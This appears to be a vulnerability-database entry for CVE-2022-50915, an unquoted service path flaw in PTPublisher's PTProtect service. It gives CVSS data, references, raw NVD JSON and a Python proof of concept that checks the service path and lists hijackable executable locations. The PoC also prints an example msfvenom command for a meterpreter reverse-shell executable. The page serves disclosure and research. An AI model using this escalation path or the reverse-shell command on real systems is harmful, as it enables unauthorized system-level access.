CVE-2022-50915

Description

PTPublisher 2.3.4 contains an unquoted service path vulnerability in the PTProtect service that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Primera Technology\PTPublisher\UsbFlashDongleService.exe' to inject malicious executables and gain system-level access.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:primera:ptpublisher:2.3.4:*:*:*:*:*:*:* - VULNERABLE

PTPublisher < 2.3.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2022-50915 PoC - PTPublisher Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in PTPublisher
# Author: Security Researcher
# Note: For educational and authorized testing purposes only

import os
import subprocess
import sys

def check_vulnerability():
    """Check if PTPublisher service is vulnerable"""
    service_name = "PTProtect"
    
    try:
        # Query service configuration using WMIC
        result = subprocess.check_output(
            ['wmic', 'service', 'where', f'name="{service_name}"', 'get', 'pathname'],
            text=True
        )
        
        print(f"[*] Service Path: {result}")
        
        # Check if path contains spaces and is not quoted
        if '"' not in result and 'Program Files' in result:
            print("[!] VULNERABLE: Service path is not quoted!")
            return True
        else:
            print("[*] NOT VULNERABLE: Service path is properly quoted")
            return False
            
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_payload(payload_path):
    """Generate reverse shell payload for privilege escalation"""
    # This is a placeholder - in real attack, attacker would generate
    # a malicious executable (e.g., meterpreter reverse shell)
    print(f"[*] Payload would be created at: {payload_path}")
    print("[*] Example: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o Program.exe")
    
def exploit():
    """Exploit unquoted service path"""
    vulnerable_paths = [
        "C:\\Program.exe",
        "C:\\Program Files (x86)\\Primera.exe",
        "C:\\Program Files (x86)\\Primera Technology\\PTPublisher.exe"
    ]
    
    print("[*] Available exploitation points:")
    for path in vulnerable_paths:
        if not os.path.exists(path):
            print(f"    [+] {path} - Available for exploitation")
        else:
            print(f"    [-] {path} - Already exists")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2022-50915 PTPublisher Unquoted Service Path PoC")
    print("=" * 60)
    
    if check_vulnerability():
        exploit()
        create_payload("C:\\Program.exe")
    else:
        print("[*] Target is not vulnerable to this attack vector")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50915
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50915
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50915/
[4] VulDB https://vuldb.com/cve/CVE-2022-50915
[5] https://www.exploit-db.com/exploits/50885
[6] https://www.primera.com/
[7] https://www.vulncheck.com/advisories/ptpublisher-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50915", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:54.897", "lastModified": "2026-03-02T15:16:26.993", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PTPublisher 2.3.4 contains an unquoted service path vulnerability in the PTProtect service that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted path in 'C:\\Program Files (x86)\\Primera Technology\\PTPublisher\\UsbFlashDongleService.exe' to inject malicious executables and gain system-level access."}, {"lang": "es", "value": "PTPublisher 2.3.4 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio PTProtect que permite a atacantes locales ejecutar potencialmente código arbitrario con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files (x86)\\Primera Technology\\PTPublisher\\UsbFlashDongleService.exe' para inyectar ejecutables maliciosos y obtener acceso a nivel de sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:primera:ptpublisher:2.3.4:*:*:*:*:*:*:*", "matchCriteriaId": "CF803684-09D5-498A-BE2D-5F7749BEFC1B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50885", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.primera.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ptpublisher-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}